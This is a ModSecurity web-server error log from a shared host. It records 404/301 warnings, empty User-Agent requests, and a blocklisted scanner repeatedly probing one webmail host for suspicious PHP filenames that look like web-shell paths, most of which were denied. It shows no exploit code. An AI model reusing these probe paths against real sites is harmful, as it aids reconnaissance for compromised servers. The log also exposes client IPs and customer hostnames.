[Tue May 26 16:28:38.574820 2026] [security2:error] [pid 795941:tid 796196] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV83e2GQ_TLE_VHIp2wSAAAAQI"]
[Tue May 26 16:28:38.581786 2026] [security2:error] [pid 795941:tid 796110] [client 74.249.212.138:7060] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/t3s.php"] [unique_id "ahV83u2GQ_TLE_VHIp2wYwAAAKw"]
[Tue May 26 16:28:38.581883 2026] [security2:error] [pid 795941:tid 796110] [client 74.249.212.138:7060] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/t3s.php"] [unique_id "ahV83u2GQ_TLE_VHIp2wYwAAAKw"]
[Tue May 26 16:28:38.966035 2026] [security2:error] [pid 795941:tid 796193] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV83u2GQ_TLE_VHIp2wbAAAAP8"]
[Tue May 26 16:28:39.058506 2026] [security2:error] [pid 795941:tid 796154] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV83u2GQ_TLE_VHIp2wbwAAANg"]
[Tue May 26 16:28:39.068733 2026] [security2:error] [pid 795941:tid 796158] [client 74.249.212.138:7110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-admin/css/"] [unique_id "ahV83-2GQ_TLE_VHIp2wcAAAANw"]
[Tue May 26 16:28:39.377192 2026] [security2:error] [pid 795941:tid 796099] [client 74.249.212.138:7110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/x/"] [unique_id "ahV83-2GQ_TLE_VHIp2wewAAAKE"]
[Tue May 26 16:28:39.449721 2026] [security2:error] [pid 795941:tid 796071] [client 74.249.212.138:7110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-admin/css/colors/modern/"] [unique_id "ahV83-2GQ_TLE_VHIp2wfAAAAIU"]
[Tue May 26 16:28:39.510359 2026] [security2:error] [pid 795941:tid 796084] [client 74.249.212.138:7110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/uwu.php"] [unique_id "ahV83-2GQ_TLE_VHIp2wfQAAAJI"]
[Tue May 26 16:28:39.510474 2026] [security2:error] [pid 795941:tid 796084] [client 74.249.212.138:7110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/uwu.php"] [unique_id "ahV83-2GQ_TLE_VHIp2wfQAAAJI"]
[Tue May 26 16:28:39.739053 2026] [security2:error] [pid 795941:tid 796077] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV83-2GQ_TLE_VHIp2wgwAAAIs"]
[Tue May 26 16:28:39.933808 2026] [security2:error] [pid 795941:tid 796104] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV83-2GQ_TLE_VHIp2wdgAAAKY"]
[Tue May 26 16:28:39.934770 2026] [security2:error] [pid 795941:tid 796083] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV83-2GQ_TLE_VHIp2wigAAAJE"]
[Tue May 26 16:28:40.166532 2026] [security2:error] [pid 795941:tid 796096] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wkQAAAJ4"]
[Tue May 26 16:28:40.271542 2026] [security2:error] [pid 795941:tid 796186] [client 74.249.212.138:7042] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/uwa.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wlQAAAPg"]
[Tue May 26 16:28:40.271674 2026] [security2:error] [pid 795941:tid 796186] [client 74.249.212.138:7042] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/uwa.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wlQAAAPg"]
[Tue May 26 16:28:40.481378 2026] [security2:error] [pid 795941:tid 796137] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wmAAAAMc"]
[Tue May 26 16:28:40.497938 2026] [security2:error] [pid 795941:tid 796169] [client 74.249.212.138:7113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/crgio.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wmQAAAOc"]
[Tue May 26 16:28:40.498061 2026] [security2:error] [pid 795941:tid 796169] [client 74.249.212.138:7113] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/crgio.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wmQAAAOc"]
[Tue May 26 16:28:40.860138 2026] [security2:error] [pid 795941:tid 796117] [client 74.249.212.138:7139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/geforce.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wpgAAALM"]
[Tue May 26 16:28:40.860258 2026] [security2:error] [pid 795941:tid 796117] [client 74.249.212.138:7139] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/geforce.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wpgAAALM"]
[Tue May 26 16:28:40.952460 2026] [security2:error] [pid 795941:tid 796122] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84O2GQ_TLE_VHIp2wpwAAALg"]
[Tue May 26 16:28:41.314333 2026] [security2:error] [pid 795941:tid 796138] [client 74.249.212.138:7167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/pucci.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wrgAAAMg"]
[Tue May 26 16:28:41.314461 2026] [security2:error] [pid 795941:tid 796138] [client 74.249.212.138:7167] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/pucci.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wrgAAAMg"]
[Tue May 26 16:28:41.465508 2026] [security2:error] [pid 795941:tid 796155] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wtAAAANk"]
[Tue May 26 16:28:41.634086 2026] [security2:error] [pid 795941:tid 796079] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wvQAAAI0"]
[Tue May 26 16:28:41.666698 2026] [security2:error] [pid 795941:tid 796165] [client 74.249.212.138:7158] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/blocks/details/"] [unique_id "ahV84e2GQ_TLE_VHIp2wxAAAAOM"]
[Tue May 26 16:28:41.727459 2026] [security2:error] [pid 795941:tid 796113] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wwwAAAK8"]
[Tue May 26 16:28:41.799256 2026] [security2:error] [pid 795941:tid 796115] [client 74.249.212.138:7158] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/blocks/audio/"] [unique_id "ahV84e2GQ_TLE_VHIp2wywAAALE"]
[Tue May 26 16:28:41.803943 2026] [security2:error] [pid 795941:tid 796192] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wxwAAAP4"]
[Tue May 26 16:28:41.863602 2026] [security2:error] [pid 795941:tid 796179] [client 74.249.212.138:7158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/one.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wzAAAAPE"]
[Tue May 26 16:28:41.863745 2026] [security2:error] [pid 795941:tid 796179] [client 74.249.212.138:7158] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/one.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wzAAAAPE"]
[Tue May 26 16:28:42.275660 2026] [security2:error] [pid 795941:tid 796137] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84u2GQ_TLE_VHIp2w0gAAAMc"]
[Tue May 26 16:28:42.391296 2026] [security2:error] [pid 795941:tid 796108] [client 74.249.212.138:7097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-temp.php"] [unique_id "ahV84u2GQ_TLE_VHIp2w1gAAAKo"]
[Tue May 26 16:28:42.391431 2026] [security2:error] [pid 795941:tid 796108] [client 74.249.212.138:7097] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-temp.php"] [unique_id "ahV84u2GQ_TLE_VHIp2w1gAAAKo"]
[Tue May 26 16:28:42.401829 2026] [security2:error] [pid 795941:tid 796088] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV84e2GQ_TLE_VHIp2wwAAAAJY"]
[Tue May 26 16:28:43.072788 2026] [security2:error] [pid 795941:tid 796123] [client 74.249.212.138:7043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/blocks/buttons/"] [unique_id "ahV84-2GQ_TLE_VHIp2w5gAAALk"]
[Tue May 26 16:28:43.210690 2026] [security2:error] [pid 795941:tid 796155] [client 74.249.212.138:7043] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/xmu.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w6wAAANk"]
[Tue May 26 16:28:43.210813 2026] [security2:error] [pid 795941:tid 796155] [client 74.249.212.138:7043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/xmu.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w6wAAANk"]
[Tue May 26 16:28:43.339536 2026] [security2:error] [pid 795941:tid 796110] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w8QAAAKw"]
[Tue May 26 16:28:43.436493 2026] [security2:error] [pid 795941:tid 796194] [client 74.249.212.138:7085] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/mode.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w9QAAAQA"]
[Tue May 26 16:28:43.436618 2026] [security2:error] [pid 795941:tid 796194] [client 74.249.212.138:7085] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/mode.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w9QAAAQA"]
[Tue May 26 16:28:43.879637 2026] [security2:error] [pid 795941:tid 796098] [client 152.232.162.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w-wAAAKA"], referer: https://www.anujtradingco.com/
[Tue May 26 16:28:43.905658 2026] [security2:error] [pid 795941:tid 796130] [client 74.249.212.138:7048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahV84-2GQ_TLE_VHIp2xAAAAAMA"]
[Tue May 26 16:28:43.905792 2026] [security2:error] [pid 795941:tid 796130] [client 74.249.212.138:7048] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/wp-admin/js/index.php"] [unique_id "ahV84-2GQ_TLE_VHIp2xAAAAAMA"]
[Tue May 26 16:28:43.929119 2026] [security2:error] [pid 795941:tid 796196] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV84-2GQ_TLE_VHIp2w7gAAAQI"]
[Tue May 26 16:28:44.133078 2026] [security2:error] [pid 795941:tid 796195] [client 74.249.212.138:7129] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/dx.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xBgAAAQE"]
[Tue May 26 16:28:44.133235 2026] [security2:error] [pid 795941:tid 796195] [client 74.249.212.138:7129] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/dx.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xBgAAAQE"]
[Tue May 26 16:28:44.328322 2026] [security2:error] [pid 795941:tid 796171] [client 74.249.212.138:7128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/puc.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xBwAAAOk"]
[Tue May 26 16:28:44.328418 2026] [security2:error] [pid 795941:tid 796171] [client 74.249.212.138:7128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/puc.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xBwAAAOk"]
[Tue May 26 16:28:44.739942 2026] [security2:error] [pid 795941:tid 796138] [client 74.249.212.138:7123] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/themes.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xEAAAAMg"]
[Tue May 26 16:28:44.740068 2026] [security2:error] [pid 795941:tid 796138] [client 74.249.212.138:7123] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/themes.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xEAAAAMg"]
[Tue May 26 16:28:44.889785 2026] [security2:error] [pid 795941:tid 796073] [client 74.249.212.138:7093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/dx.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xEwAAAIc"]
[Tue May 26 16:28:44.889900 2026] [security2:error] [pid 795941:tid 796073] [client 74.249.212.138:7093] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/dx.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xEwAAAIc"]
[Tue May 26 16:28:44.997725 2026] [security2:error] [pid 795941:tid 796163] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xFgAAAOE"]
[Tue May 26 16:28:45.055742 2026] [security2:error] [pid 795941:tid 796081] [client 92.118.39.194:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "yourstorybag.com"] [uri "/index.php"] [unique_id "ahV85O2GQ_TLE_VHIp2xHwAAAI8"]
[Tue May 26 16:28:45.202079 2026] [security2:error] [pid 795941:tid 796137] [client 74.249.212.138:7140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/11.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xLQAAAMc"]
[Tue May 26 16:28:45.202163 2026] [security2:error] [pid 795941:tid 796137] [client 74.249.212.138:7140] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/11.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xLQAAAMc"]
[Tue May 26 16:28:45.391001 2026] [security2:error] [pid 795941:tid 796113] [client 74.249.212.138:7143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/p.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xMwAAAK8"]
[Tue May 26 16:28:45.391103 2026] [security2:error] [pid 795941:tid 796113] [client 74.249.212.138:7143] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/p.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xMwAAAK8"]
[Tue May 26 16:28:45.559062 2026] [security2:error] [pid 795941:tid 796186] [client 152.232.162.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xOQAAAPg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1224835&moderation-hash=f5ff9e7c03587304e3990899337cca54
[Tue May 26 16:28:45.636892 2026] [security2:error] [pid 795941:tid 796175] [client 74.249.212.138:7070] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "webmail.gldmarsa.com"] [uri "/___proxy_subdomain_webmail/wp-includes/Requests/"] [unique_id "ahV85e2GQ_TLE_VHIp2xPgAAAO0"]
[Tue May 26 16:28:45.823427 2026] [security2:error] [pid 795941:tid 796155] [client 74.249.212.138:7070] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/bthil.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xSgAAANk"]
[Tue May 26 16:28:45.823542 2026] [security2:error] [pid 795941:tid 796155] [client 74.249.212.138:7070] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/bthil.php"] [unique_id "ahV85e2GQ_TLE_VHIp2xSgAAANk"]
[Tue May 26 16:28:46.151184 2026] [security2:error] [pid 795941:tid 796073] [client 74.249.212.138:7122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.gldmarsa.com"] [uri "/7.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xUAAAAIc"]
[Tue May 26 16:28:46.151296 2026] [security2:error] [pid 795941:tid 796073] [client 74.249.212.138:7122] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "webmail.gldmarsa.com"] [uri "/7.php"] [unique_id "ahV85u2GQ_TLE_VHIp2xUAAAAIc"]
